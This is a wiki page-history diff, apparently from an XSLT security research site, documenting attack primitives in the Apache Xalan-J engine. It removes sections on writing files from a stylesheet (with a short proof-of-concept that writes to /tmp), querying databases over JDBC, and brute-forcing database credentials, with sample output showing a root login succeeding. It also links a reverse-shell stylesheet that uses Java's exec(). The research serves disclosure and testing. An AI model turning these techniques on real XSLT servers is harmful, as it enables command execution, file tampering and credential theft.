Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 60.1 Icon
edited by Nicolas Gregoire
on 2012/01/12 22:08
Change comment: There is no comment for this version
To version Icon 53.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 23:55
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -56,33 +56,3 @@
56 56  |http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]]
57 57  
58 58  __Note__ : as arrays are not a native type in XSLT, we create one in Java via split() before passing it as an argument to [[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]].
59 -
60 -== File creation ==
61 -
62 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten.
63 -
64 -|=Namespace|=Extension element|=Parameter|=PoC
65 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]]
66 -
67 -== JDBC connectivity ==
68 -
69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
70 -
71 -|=Namespace|=Extension function|=PoC
72 -|org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]]
73 -
74 -=== Brute-force ===
75 -
76 -The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
77 -
78 -Here's the output when launched from the CLI :
79 -$> java org.apache.xalan.xslt.Process -in xalanj-jdbc-bruteforce.xml -xsl xalanj-jdbc-bruteforce.xsl 2> /dev/null
80 -Username : [root] / Password : [] :
81 -Username : [root] / Password : [uberpasswd] :
82 -Username : [root] / Password : [cnam] : OK !!
83 -Username : [pma] / Password : [pma] :
84 -
85 -
86 -
87 -
88 -
Icon xalanj-write.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -373 bytes
Content
... ... @@ -1,13 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 - xmlns:redir="http://xml.apache.org/xalan/redirect"
3 - extension-element-prefixes="redir"
4 - version='1.0'>
5 -
6 - <xsl:template match="/">
7 - <redir:write file="/tmp/created_by_xalanj_write" method="text">
8 - <xsl:text>Just a PoC</xsl:text>
9 - </redir:write>
10 - </xsl:template>
11 -
12 -</xsl:stylesheet>
13 -